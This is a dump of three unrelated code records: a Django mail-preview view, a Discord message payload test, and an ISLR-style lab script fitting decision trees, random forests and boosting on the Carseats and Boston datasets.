' %\n factory.get_raw_content(self.mail_name,\n [settings.DEFAULT_FROM_EMAIL],\n form.cleaned_data).message())\n elif self.send:\n factory.mail(self.mail_name, [self.email], form.cleaned_data)\n messages.success(self.request,\n '%s mail sent to %s' % (self.mail_name,\n self.email))\n return redirect('mail_factory_list')\n\n else:\n return HttpResponse(\n factory.get_html_for(self.mail_name, form.cleaned_data))\n\n def get_context_data(self, **kwargs):\n data = super(MailFormView, self).get_context_data(**kwargs)\n try:\n data['admin_email'] = settings.ADMINS[0][1]\n except IndexError:\n data['admin_email'] = getattr(\n settings, 'SUPPORT_EMAIL',\n getattr(settings, 'DEFAULT_FROM_EMAIL', ''))\n\n return data\n\n\nmail_list = login_required(MailListView.as_view())\nform = login_required(MailFormView.as_view())\n", "sub_path": "mail_factory/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2560, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 12, "usage_type": "name"}, {"api_name": "mail_factory.factory.mail_map.items", "line_number": 21, "usage_type": "call"}, {"api_name": "mail_factory.factory.mail_map", "line_number": 21, "usage_type": "attribute"}, {"api_name": "mail_factory.factory", "line_number": 21, "usage_type": "name"}, {"api_name": "django.views.generic.FormView", "line_number": 27, "usage_type": "name"}, {"api_name": "mail_factory.factory.mail_map", "line_number": 32, "usage_type": "attribute"}, {"api_name": "mail_factory.factory", "line_number": 32, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 33, "usage_type": "name"}, {"api_name": "mail_factory.factory._get_mail_form", "line_number": 42, "usage_type": "call"}, {"api_name": "mail_factory.factory", "line_number": 42, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 46, "usage_type": "call"}, {"api_name": "mail_factory.factory.get_raw_content", "line_number": 47, "usage_type": "call"}, {"api_name": "mail_factory.factory", "line_number": 47, "usage_type": "name"}, {"api_name": "django.conf.settings.DEFAULT_FROM_EMAIL", "line_number": 48, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 48, "usage_type": "name"}, {"api_name": "mail_factory.factory.mail", "line_number": 51, "usage_type": "call"}, {"api_name": "mail_factory.factory", "line_number": 51, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 52, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 52, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 55, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 58, "usage_type": "call"}, {"api_name": "mail_factory.factory.get_html_for", "line_number": 59, "usage_type": "call"}, {"api_name": "mail_factory.factory", "line_number": 59, "usage_type": "name"}, {"api_name": "django.conf.settings.ADMINS", "line_number": 64, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 64, "usage_type": "name"}, {"api_name": "django.conf.settings", "line_number": 67, "usage_type": "argument"}, {"api_name": "django.conf.settings", "line_number": 68, "usage_type": "argument"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 73, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "579510860", "text": "from discord import Message\nimport datetime\nfrom collections import namedtuple\nimport json\n\n\nMockPayload = namedtuple(\"Payload\", [\"data\"])\n\n\ndef test_from_payload():\n payload = MockPayload({\n \"content\": \"hello\",\n \"channel_id\": \"my_channel_id123\",\n \"author\": {\n \"id\": \"1234\",\n \"username\": \"Django\",\n \"discriminator\": \"#1235\"\n },\n \"timestamp\": datetime.datetime.now(),\n \"mentions\": []\n })\n\n message = Message.from_payload(payload)\n\n assert isinstance(message, Message)\n assert message.content == payload.data[\"content\"]\n assert message.channel_id == payload.data[\"channel_id\"]\n assert message.author_id == payload.data[\"author\"][\"id\"]\n assert message.username == payload.data[\"author\"][\"username\"] + \"#\" + payload.data[\"author\"][\"discriminator\"]\n assert message.timestamp == payload.data[\"timestamp\"]\n\n\ndef test_to_payload():\n payload = MockPayload({\n \"content\": \"hello\",\n \"channel_id\": \"my_channel_id123\",\n \"author\": {\n \"id\": \"1234\",\n \"username\": \"Django\",\n \"discriminator\": \"#1235\"\n },\n \"timestamp\": datetime.datetime.now(),\n \"mentions\": []\n })\n\n message = Message.from_payload(payload)\n new_payload = message.to_payload()\n\n assert new_payload[\"content\"] == payload.data[\"content\"]\n assert new_payload[\"tts\"] == False\n assert new_payload[\"embed\"] == message.embed\n\n\ndef test_to_json():\n payload = MockPayload({\n \"content\": \"hello\",\n \"channel_id\": \"my_channel_id123\",\n \"author\": {\n \"id\": \"1234\",\n \"username\": \"Django\",\n \"discriminator\": \"#1235\"\n },\n \"timestamp\": datetime.datetime.now(),\n \"mentions\": []\n })\n\n message = Message.from_payload(payload)\n payload = message.to_payload()\n\n json_payload = message.to_json()\n\n reconstructed = json.loads(json_payload)\n\n assert payload == reconstructed\n", "sub_path": "tests/discord/message_test.py", "file_name": "message_test.py", "file_ext": "py", "file_size_in_byte": 2000, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "collections.namedtuple", "line_number": 7, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "discord.Message.from_payload", "line_number": 23, "usage_type": "call"}, {"api_name": "discord.Message", "line_number": 23, "usage_type": "name"}, {"api_name": "discord.Message", "line_number": 25, "usage_type": "argument"}, {"api_name": "datetime.datetime.now", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 42, "usage_type": "attribute"}, {"api_name": "discord.Message.from_payload", "line_number": 46, "usage_type": "call"}, {"api_name": "discord.Message", "line_number": 46, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 63, "usage_type": "attribute"}, {"api_name": "discord.Message.from_payload", "line_number": 67, "usage_type": "call"}, {"api_name": "discord.Message", "line_number": 67, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 72, "usage_type": "call"}]} +{"seq_id": "460027696", "text": "# -----------------------------------------\n# Chapter 8 - Lab: Decision Trees\n# -----------------------------------------\n\n\n#%% -----------------------------------------\n# Import packages\n# -------------------------------------------\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nimport os\n\n# Regression libs\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn import tree\nfrom sklearn.metrics import confusion_matrix, mean_squared_error, make_scorer\nimport sklearn.ensemble as ens\n\nimport graphviz\n\n\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.metrics import roc_curve, roc_auc_score\nfrom sklearn.metrics import make_scorer, mean_squared_error\nfrom sklearn.model_selection import train_test_split, cross_val_score\nfrom sklearn.utils import resample\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nfrom sklearn.base import BaseEstimator, RegressorMixin\n\nimport itertools\nimport time\n\n\n#%% -----------------------------------------\n# Settings\n# -------------------------------------------\n\n# Set working directory\nos.getcwd()\nos.chdir('/Users/viktor.eriksson2/Documents/python_files/miscellanious/stanford-statistical-learning')\nos.getcwd()\n\n# Plot settings\nsns.set()\n\n\n#%% -----------------------------------------\n# Load data\n# -------------------------------------------\n\n# Datasets from ISLR\ncarseats = pd.read_csv('data/carseats.csv')\ncarseats.info()\ncarseats.head(10)\n\nboston = pd.read_csv('data/boston.csv')\nboston.info()\nboston.head(10)\n\n\n#%% -----------------------------------------\n# Functions\n# -------------------------------------------\n\n\n#%% -----------------------------------------\n# Data prepping\n# -------------------------------------------\n\n#######################\n# Carseats dataset\n#######################\n\n# Check null values\ncarseats.isna().sum()\n\n# Plot distribution of Sales variable\nplt.figure(figsize=(10, 7))\nsns.distplot(carseats['Sales'])\n\n# Mean and median of Sales variable\ncarseats['Sales'].mean()\ncarseats['Sales'].median()\n\n# Create binary variable indicating if Sales are high or not\n# carseats['high'] = [0 if x <= 8 else 1 for x in carseats['Sales']]\ncarseats['high'] = carseats['Sales'].map(lambda x: 0 if x <= 8 else 1)\ncarseats.head(10)\n\n# Create dummy variables for categorical predictors\ndummies = pd.get_dummies(carseats[['ShelveLoc', 'Urban', 'US']])\n\n# Create new dataframe with predictiors and response\ny = carseats[['high']]\nX_ = carseats.drop(columns=['Sales', 'high', 'ShelveLoc', 'Urban', 'US'])\nX = pd.concat([X_, dummies[['ShelveLoc_Bad', 'ShelveLoc_Good', 'ShelveLoc_Medium', 'Urban_Yes', 'US_Yes']]], axis=1)\n\n# Pairplot\nplt.figure(figsize=(10, 7))\nsns.pairplot(pd.concat([y, X], axis=1), hue='high')\n\n#######################\n# Boston dataset\n#######################\n\n# Check null values\nboston.isna().sum()\n\n# Pairplot\nplt.figure(figsize=(10, 7))\nsns.pairplot(boston)\n\n\n#%% -----------------------------------------\n# Fitting classification trees\n# -------------------------------------------\n\n# Split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)\n\n# Fit tree classifier\nclf_tree = tree.DecisionTreeClassifier(max_depth=6).fit(X_train, y_train)\n\n# Score\nclf_tree.score(X_train, y_train)\nclf_tree.score(X_test, y_test)\n\n# Confusion matrix\ncnf_mat = confusion_matrix(y_test, clf_tree.predict(X_test))\ncnf_mat[1,1]/cnf_mat[:,1].sum() # true positive rate\ncnf_mat[1,0]/cnf_mat[:,0].sum() # false positive rate\nnp.diag(cnf_mat).sum()/cnf_mat.sum() # classification rate\n\nclf_tree.tree_.node_count\nclf_tree.tree_.max_depth\n\n# Visualize\ndot_data = tree.export_graphviz(clf_tree, out_file=None,\n feature_names=X_train.columns, \n class_names=['0', '1'], \n filled=True, rounded=True)\n\ngraph = graphviz.Source(dot_data)\ngraph\n# display(HTML(graph._repr_svg_()))\n\n# Plot most important features in model\nplt.figure(figsize=(10, 7))\nsns.barplot(x='importance', y='feature', data=pd.DataFrame({\n 'feature': X.columns, 'importance': clf_tree.feature_importances_\n}).sort_values(['importance'], ascending=False), color='b')\n\n\n#######################\n# Tree pruning\n#######################\n\nclf_pr = tree.DecisionTreeClassifier()\npath = clf_pr.cost_complexity_pruning_path(X_train, y_train)\nccp_alphas, impurities = path.ccp_alphas, path.impurities\n\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=ccp_alphas[:-1], y=impurities[:-1])\nplt.xlabel('effective alpha')\nplt.ylabel('total impurity of leaves')\nplt.title('Total Impurity vs effective alpha for training set')\n\nclfs = []\nRMSe = []\n\nfor a in ccp_alphas:\n clf = tree.DecisionTreeClassifier(ccp_alpha=a)\n \n # Cross validation\n scores = cross_val_score(clf, X_train, y_train, cv=7)\n rmse = np.mean(scores)\n ci = np.std(scores)*1.96\n\n # Fit to train data\n clf.fit(X_train, y_train)\n no_nodes = clf.tree_.node_count\n\n # Predict on test data\n y_pred = clf.predict(X_test)\n test_mse = mean_squared_error(y_test, y_pred)\n\n # Save results\n RMSe += [[rmse, rmse+ci, rmse-ci, test_mse, no_nodes, a]]\n clfs.append(clf)\n \n\nclfs\nRMSe\n\nprint('Number of nodes in the last tree is: {} with ccp_alpha: {}'.format(\n clfs[-1].tree_.node_count, ccp_alphas[-1]))\n\nclfs[-1].tree_.max_depth\n\n# Plot results\nplt.figure(figsize=(10, 7))\nplt.subplot(3, 1, 1)\nsns.lineplot(x=ccp_alphas[:-1], y=[x.tree_.node_count for x in clfs[:-1]])\nplt.xlabel('alphas')\nplt.ylabel('nr of nodes')\n\nplt.subplot(3, 1, 2)\nsns.lineplot(x=ccp_alphas[:-1], y=[x.tree_.max_depth for x in clfs[:-1]])\nplt.xlabel('alphas')\nplt.ylabel('depth of tree')\n\nplt.subplot(3, 1, 3)\nsns.lineplot(x=ccp_alphas[:-1], y=pd.DataFrame(RMSe).iloc[:-1,0])\nplt.xlabel('alphas')\nplt.ylabel('MSE')\n\n# Plot MSE against number of nodes\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=[x.tree_.node_count for x in clfs[:-1]], y=pd.DataFrame(RMSe).iloc[:-1,0], label='MSE')\nsns.lineplot(x=[x.tree_.node_count for x in clfs[:-1]], y=pd.DataFrame(RMSe).iloc[:-1,1], label='CI upper')\nsns.lineplot(x=[x.tree_.node_count for x in clfs[:-1]], y=pd.DataFrame(RMSe).iloc[:-1,2], label='CI lower')\nplt.xlabel('nr of nodes')\nplt.ylabel('MSE')\n\ntrain_scores = [clf.score(X_train, y_train) for clf in clfs]\ntest_scores = [clf.score(X_test, y_test) for clf in clfs]\n\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=ccp_alphas[:-1], y=[x.score(X_train, y_train) for x in clfs[:-1]], label='train')\nsns.lineplot(x=ccp_alphas[:-1], y=[x.score(X_test, y_test) for x in clfs[:-1]], label='test')\nplt.xlabel('alphas')\nplt.ylabel('accuracy')\n\n# Min MSE\nMSE_df = pd.DataFrame(RMSe)\nMSE_df[MSE_df.iloc[:,0] == MSE_df.iloc[:,0].min()]\n\n# Tree corresponding to smallest MSE\nopt_clf = clfs[388]\nopt_clf.fit(X_train, y_train)\nopt_clf.tree_.max_depth\nopt_clf.tree_.node_count\n\ny_pred = opt_clf.predict(X_test)\nnp.sqrt(mean_squared_error(y_test, y_pred)) # ~3.49\n\"\"\"\nThis means that the optimal model from our training set yields a model which \nindicates that this model leads to test predictions that are within \n$3,490 of the true median home value for the suburb.\n\"\"\"\n\n\n#%% -----------------------------------------\n# Fitting regression trees\n# -------------------------------------------\n\n# Split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(boston.drop(columns=['medv']), boston[['medv']], test_size=0.1, random_state=1)\n\n# Fit regression tree\nregr_tree = tree.DecisionTreeRegressor(max_depth=6).fit(X_train, y_train)\n\n# Prediction\ny_pred = regr_tree.predict(X_test)\n\n# Root mean-square-error\nrmse = np.sqrt(mean_squared_error(y_test, y_pred))\nprint('RMSE test: {}'.format(np.round(rmse, 2)))\n\n# Visualise the tree with GraphViz\ndot_data = tree.export_graphviz(regr_tree, out_file=None,\n feature_names=X_train.columns, \n filled=True, rounded=True)\ngraph = graphviz.Source(dot_data)\ngraph\n\nregr_tree.tree_.node_count\nregr_tree.tree_.max_depth\n\n#######################\n# Tree pruning\n#######################\n\nregr_pr = tree.DecisionTreeRegressor()\npath = regr_pr.cost_complexity_pruning_path(X_train, y_train)\nccp_alphas, impurities = path.ccp_alphas, path.impurities\n\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=ccp_alphas[:-1], y=impurities[:-1])\nplt.xlabel('effective alpha')\nplt.ylabel('total impurity of leaves')\nplt.title('Total Impurity vs effective alpha for training set')\n\nclfs = []\nRMSe = []\n\nmse = make_scorer(mean_squared_error)\n\nfor a in ccp_alphas:\n clf = tree.DecisionTreeRegressor(ccp_alpha=a)\n \n # Cross validation\n scores = cross_val_score(clf, X_train, y_train, cv=7, scoring=mse)\n rmse = np.mean(scores)\n ci = np.std(scores)*1.96\n\n # Fit to train data\n clf.fit(X_train, y_train)\n no_nodes = clf.tree_.node_count\n\n # Predict on test data\n y_pred = clf.predict(X_test)\n test_mse = mean_squared_error(y_test, y_pred)\n\n # Save results\n RMSe += [[rmse, rmse+ci, rmse-ci, test_mse, no_nodes, a]]\n clfs.append(clf)\n\nclfs\nRMSe\n\nprint('Number of nodes in the last tree is: {} with ccp_alpha: {}'.format(\n clfs[-1].tree_.node_count, ccp_alphas[-1]))\n\nclfs[-1].tree_.max_depth\n\n# Plot results\nplt.figure(figsize=(10, 7))\nplt.subplot(3, 1, 1)\nsns.lineplot(x=ccp_alphas, y=[x.tree_.node_count for x in clfs])\nplt.xlabel('alphas')\nplt.ylabel('nr of nodes')\n\nplt.subplot(3, 1, 2)\nsns.lineplot(x=ccp_alphas, y=[x.tree_.max_depth for x in clfs])\nplt.xlabel('alphas')\nplt.ylabel('depth of tree')\n\nplt.subplot(3, 1, 3)\nsns.lineplot(x=ccp_alphas, y=pd.DataFrame(RMSe).iloc[:,0])\nplt.xlabel('alphas')\nplt.ylabel('MSE')\n\n# Plot MSE against number of nodes\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=[x.tree_.node_count for x in clfs], y=pd.DataFrame(RMSe).iloc[:,0], label='cross-validation')\nsns.lineplot(x=[x.tree_.node_count for x in clfs], y=pd.DataFrame(RMSe).iloc[:,1], label='CI upper')\nsns.lineplot(x=[x.tree_.node_count for x in clfs], y=pd.DataFrame(RMSe).iloc[:,2], label='CI lower')\nplt.xlabel('nr of nodes')\nplt.ylabel('MSE')\n\ntrain_scores = [clf.score(X_train, y_train) for clf in clfs]\ntest_scores = [clf.score(X_test, y_test) for clf in clfs]\n\nplt.figure(figsize=(10, 7))\nsns.lineplot(x=ccp_alphas, y=[x.score(X_train, y_train) for x in clfs], label='train')\nsns.lineplot(x=ccp_alphas, y=[x.score(X_test, y_test) for x in clfs], label='test')\nplt.xlabel('alphas')\nplt.ylabel('accuracy')\n\n# Min MSE\nMSE_df = pd.DataFrame(RMSe)\nMSE_df[MSE_df.iloc[:,0] == MSE_df.iloc[:,0].min()]\n\"\"\"\nWe have two trees with the same MSE. We pick the one with the least\nnumber of nodes\n\"\"\"\n\n# Tree corresponding to smallest MSE\nopt_clf = clfs[388]\nopt_clf.fit(X_train, y_train)\nopt_clf.tree_.max_depth\nopt_clf.tree_.node_count\n\ny_pred = opt_clf.predict(X_test)\nnp.sqrt(mean_squared_error(y_test, y_pred)) # ~3.49\n\"\"\"\nThis means that the optimal model from our training set yields a model which \nindicates that this model leads to test predictions that are within \n$3,490 of the true median home value for the suburb.\n\"\"\"\n\n\n#%% -----------------------------------------\n# Bagging and random forest\n# -------------------------------------------\n\n# Split data into training and test sets\nX = boston.drop(columns=['medv'])\ny = boston[['medv']]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)\n\n# Bagging regression. Same as random forest but all predictors are used\nregr_bg = ens.RandomForestRegressor(max_features=X_train.shape[1], n_estimators=100, random_state=0).fit(X_train, y_train)\n\n# Prediction\ny_pred = regr_bg.predict(X_test)\n\nprint('The MSE is: {}'.format(mean_squared_error(y_test, y_pred)))\nprint('The RMSE is: {}'.format(np.sqrt(mean_squared_error(y_test, y_pred))))\n\"\"\"\nBagging significantly improves the RMSE\n\"\"\"\n\n# Random forest with 6 predictors\nregr_rf = ens.RandomForestRegressor(max_features=6, n_estimators=100, random_state=0).fit(X_train, y_train)\n\n# Prediction\ny_pred = regr_rf.predict(X_test)\n\nprint('The MSE is: {}'.format(mean_squared_error(y_test, y_pred)))\nprint('The RMSE is: {}'.format(np.sqrt(mean_squared_error(y_test, y_pred))))\n\"\"\"\nRandom forest yields slightly higher results than bagging but almost the same\n\"\"\"\n\n# Compare different forest algorithms\nresults = []\n\nfor i in np.arange(2, 101):\n # Tree algorithms\n regr_bg = ens.RandomForestRegressor(max_features=X_train.shape[1], n_estimators=100, oob_score=True, max_leaf_nodes=i)\n regr_rf1 = ens.RandomForestRegressor(max_features=4, n_estimators=100, oob_score=True, max_leaf_nodes=i)\n regr_rf2 = ens.RandomForestRegressor(max_features=6, n_estimators=100, oob_score=True, max_leaf_nodes=i)\n\n # Fit models\n fit_bg = regr_bg.fit(X_train, y_train)\n fit_rf1 = regr_rf1.fit(X_train, y_train)\n fit_rf2 = regr_rf2.fit(X_train, y_train)\n\n # Predictions\n pred_bg = fit_bg.predict(X_test)\n pred_rf1 = fit_rf1.predict(X_test)\n pred_rf2 = fit_rf2.predict(X_test)\n\n # MSE\n mse_bg = mean_squared_error(y_test, pred_bg)\n mse_rf1 = mean_squared_error(y_test, pred_rf1)\n mse_rf2 = mean_squared_error(y_test, pred_rf2)\n\n # OOBs\n oob_bg = fit_bg.oob_score_\n oob_rf1 = fit_rf1.oob_score_\n oob_rf2 = fit_rf2.oob_score_\n\n # Results\n results += [[i, mse_bg, mse_rf1, mse_rf2, oob_bg, oob_rf1, oob_rf2]]\n\nres_df = pd.DataFrame(results, columns=['no_leafs', 'mse_bg', 'mse_rf1', 'mse_rf2', 'oob_bg', 'oob_rf1', 'oob_rf2'])\n\n# Plot results\nplt.figure(figsize=(10,7))\nplt.subplot(2, 1, 1)\nsns.lineplot(x='no_leafs', y='mse_bg', data=res_df, label='bagging')\nsns.lineplot(x='no_leafs', y='mse_rf1', data=res_df, label='random forest m=4')\nsns.lineplot(x='no_leafs', y='mse_rf2', data=res_df, label='random forest m=6')\nplt.ylabel('MSE')\n\nplt.subplot(2, 1, 2)\nsns.lineplot(x='no_leafs', y='oob_bg', data=res_df, label='bagging')\nsns.lineplot(x='no_leafs', y='oob_rf1', data=res_df, label='random forest m=4')\nsns.lineplot(x='no_leafs', y='oob_rf2', data=res_df, label='random forest m=6')\nplt.ylabel('OOB score')\n\"\"\"\nTrying different sizes of training data will give different results.\nFor a larger training set, bagging seems to perform better.\nFor smaller training sets, random forest might be a better option.\n\nIt looks like about 20 leafs gives a good enough prediction\n\"\"\"\n\n# Plot most important features for each model\nfit_bg = ens.RandomForestRegressor(max_features=X_train.shape[1], n_estimators=100, oob_score=True, max_leaf_nodes=20).fit(X_train, y_train)\nfit_rf1 = ens.RandomForestRegressor(max_features=4, n_estimators=100, oob_score=True, max_leaf_nodes=20).fit(X_train, y_train)\nfit_rf2 = ens.RandomForestRegressor(max_features=6, n_estimators=100, oob_score=True, max_leaf_nodes=20).fit(X_train, y_train)\n\nplt.figure(figsize=(10, 15))\nplt.subplot(3, 1, 1)\nsns.barplot(x='importance', y='feature', data=pd.DataFrame({\n 'feature': X.columns, 'importance': fit_bg.feature_importances_\n}).sort_values(['importance'], ascending=False), color='b')\nplt.title('Bagging')\nplt.xlabel('')\n\nplt.subplot(3, 1, 2)\nsns.barplot(x='importance', y='feature', data=pd.DataFrame({\n 'feature': X.columns, 'importance': fit_rf1.feature_importances_\n}).sort_values(['importance'], ascending=False), color='b')\nplt.title('Random forest m=4')\nplt.xlabel('')\n\nplt.subplot(3, 1, 3)\nsns.barplot(x='importance', y='feature', data=pd.DataFrame({\n 'feature': X.columns, 'importance': fit_rf2.feature_importances_\n}).sort_values(['importance'], ascending=False), color='b')\nplt.title('Random forest m=6')\n\n\n# # OOB error rates\n# ensemble_clfs = [\n# (\"RandomForestClassifier, max_features=13\",\n# ens.RandomForestClassifier(warm_start=True, oob_score=True,\n# max_features=X_train.shape[1],\n# random_state=1)),\n# (\"RandomForestClassifier, max_features=4\",\n# ens.RandomForestClassifier(warm_start=True, max_features=4,\n# oob_score=True,\n# random_state=1)),\n# (\"RandomForestClassifier, max_features=6\",\n# ens.RandomForestClassifier(warm_start=True, max_features=6,\n# oob_score=True,\n# random_state=1))\n# ]\n\n# # Map a classifier name to a list of (, ) pairs.\n# error_rate = OrderedDict((label, []) for label, _ in ensemble_clfs)\n\n# # Range of `n_estimators` values to explore.\n# min_estimators = 2\n# max_estimators = 13\n# OOBs = pd.DataFrame({\n# 'Bagging': [],\n# 'Random forest 1': [],\n# 'Random forest 2': []\n# })\n\n# OOBs\n\n# for clf in ensemble_clfs:\n# for i in range(min_estimators, max_estimators + 1):\n# clf.set_params(n_estimators=i)\n# clf.fit(X, y)\n\n# # Record the OOB error for each `n_estimators=i` setting.\n# oob_error = 1 - clf.oob_score_\n# pd.DataFrame()\n# error_rate[label].append((i, oob_error))\n\n\n#%% -----------------------------------------\n# Boosting\n# -------------------------------------------\n\n# Split data into training and test sets\nX = boston.drop(columns=['medv'])\ny = boston[['medv']]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=3)\n\n# Boosting regression\nregr_boo = ens.GradientBoostingRegressor(max_features='auto', n_estimators=5000, max_depth=4, learning_rate=0.01).fit(X_train, y_train)\n\n# Predict\ny_pred = regr_boo.predict(X_test)\n\n# MSE\nprint('The MSE for the boosted tree is: {}'.format(mean_squared_error(y_test, y_pred)))\nprint('The RMSE for the boosted tree is: {}'.format(np.sqrt(mean_squared_error(y_test, y_pred))))\n\"\"\"\nUsing a boosted tree on the data yields results of the magnitude of bagging and random forest\n\"\"\"\n\n# Try boosting with different depths\nMSEs = []\nfor i in np.arange(2, 201):\n # Models\n regr_boo1 = ens.GradientBoostingRegressor(max_features='auto', n_estimators=i, max_depth=4, learning_rate=0.08).fit(X_train, y_train)\n regr_boo2 = ens.GradientBoostingRegressor(max_features='auto', n_estimators=i, max_depth=6, learning_rate=0.08).fit(X_train, y_train)\n regr_boo3 = ens.GradientBoostingRegressor(max_features='sqrt', n_estimators=i, max_depth=6, learning_rate=0.08).fit(X_train, y_train)\n regr_boo4 = ens.GradientBoostingRegressor(max_features='log2', n_estimators=i, max_depth=6, learning_rate=0.08).fit(X_train, y_train)\n\n # Predictions\n mse1 = mean_squared_error(y_test, regr_boo1.predict(X_test))\n mse2 = mean_squared_error(y_test, regr_boo2.predict(X_test))\n mse3 = mean_squared_error(y_test, regr_boo3.predict(X_test))\n mse4 = mean_squared_error(y_test, regr_boo4.predict(X_test))\n\n # Results\n MSEs += [[i, mse1, mse2, mse3, mse4]]\n\nres_df = pd.DataFrame(MSEs, columns=['no_trees', 'mse1', 'mse2', 'mse3', 'mse4'])\nres_df\n\n# Plot results\nplt.figure(figsize=(10, 7))\nsns.lineplot(x='no_trees', y='mse1', data=res_df, label='boosting depth=4')\nsns.lineplot(x='no_trees', y='mse2', data=res_df, label='boosting depth=6')\nsns.lineplot(x='no_trees', y='mse3', data=res_df, label=\"boosting depth=6, features='sqrt'\")\nsns.lineplot(x='no_trees', y='mse4', data=res_df, label=\"boosting depth=6, features='log2'\")\nplt.xlabel('number of trees')\nplt.ylabel('MSE')\n\n# Lets try all again but for just 1 iteration with 5000 trees\nregr_boo1 = ens.GradientBoostingRegressor(max_features='auto', n_estimators=5000, max_depth=4, learning_rate=0.05).fit(X_train, y_train)\nregr_boo2 = ens.GradientBoostingRegressor(max_features='auto', n_estimators=5000, max_depth=6, learning_rate=0.05).fit(X_train, y_train)\nregr_boo3 = ens.GradientBoostingRegressor(max_features='sqrt', n_estimators=5000, max_depth=6, learning_rate=0.05).fit(X_train, y_train)\nregr_boo4 = ens.GradientBoostingRegressor(max_features='log2', n_estimators=5000, max_depth=6, learning_rate=0.05).fit(X_train, y_train)\n\nprint('The RMSE for auto, depth=4 is: {}'.format(np.sqrt(mean_squared_error(y_test, regr_boo1.predict(X_test)))))\nprint('The RMSE for auto, depth=6 is: {}'.format(np.sqrt(mean_squared_error(y_test, regr_boo2.predict(X_test)))))\nprint('The RMSE for sqrt, depth=6 is: {}'.format(np.sqrt(mean_squared_error(y_test, regr_boo3.predict(X_test)))))\nprint('The RMSE for log2, depth=6 is: {}'.format(np.sqrt(mean_squared_error(y_test, regr_boo4.predict(X_test)))))\n\n", "sub_path": "ch8-tree-based-methods/ch8-lab-decision-trees.py", "file_name": "ch8-lab-decision-trees.py", "file_ext": "py", "file_size_in_byte": 20366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.getcwd", "line_number": 44, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 45, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 46, "usage_type": "call"}, {"api_name": "seaborn.set", "line_number": 49, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 57, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "seaborn.distplot", "line_number": 84, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 101, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "seaborn.pairplot", "line_number": 105, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "seaborn.pairplot", "line_number": 116, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 127, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 127, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 137, "usage_type": "call"}, {"api_name": "sklearn.tree.export_graphviz", "line_number": 143, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 143, "usage_type": "name"}, {"api_name": "graphviz.Source", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 153, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 153, "usage_type": "name"}, {"api_name": "seaborn.barplot", "line_number": 154, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 163, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 169, "usage_type": "call"}, 